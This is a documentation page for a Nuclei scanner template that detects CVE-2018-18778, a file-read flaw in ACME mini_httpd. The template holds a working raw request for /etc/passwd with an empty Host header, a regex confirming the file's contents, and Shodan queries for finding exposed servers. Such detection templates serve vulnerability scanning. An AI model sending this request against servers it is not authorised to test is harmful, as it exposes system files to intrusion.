ACME mini_httpd <1.30 - Local File Inclusion
ID: CVE-2018-18778
Severity: medium
Author: DhiyaneshDK,dogasantos
Tags: cve,cve2018,lfi,mini_httpd,acme
Description
Section titled “Description”ACME mini_httpd before 1.30 is vulnerable to local file inclusion.
YAML Source
Section titled “YAML Source”id: CVE-2018-18778
info: name: ACME mini_httpd <1.30 - Local File Inclusion author: DhiyaneshDK,dogasantos severity: medium description: ACME mini_httpd before 1.30 is vulnerable to local file inclusion. impact: | Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server. remediation: | Upgrade ACME mini_httpd to version 1.30 or later to mitigate this vulnerability. reference: - https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/ - http://www.acme.com/software/mini_httpd/ - https://nvd.nist.gov/vuln/detail/CVE-2018-18778 - https://github.com/0xT11/CVE-POC - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2018-18778 cwe-id: CWE-200 epss-score: 0.39341 epss-percentile: 0.97248 cpe: cpe:2.3:a:acme:mini-httpd:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: acme product: mini-httpd shodan-query: - 'Server: mini_httpd && 200' - cpe:"cpe:2.3:a:acme:mini-httpd" - "server: mini_httpd && 200" tags: cve,cve2018,lfi,mini_httpd,acme
flow: http(1) && http(2)
http: - method: GET path: - "{{BaseURL}}"
matchers: - type: word part: header words: - "Server: mini_httpd" internal: true
- raw: - |+ GET /etc/passwd HTTP/1.1 Host:
unsafe: true
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 4a0a00473045022100a7ea64fe7fb2227aae33a43ae577d80618aeeabf90f90adfccf72636e15870ae02205da338ff7fbd5cb061487d883a40e67d42f9bd112757fa24815511525c717f5e:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-18778.yaml"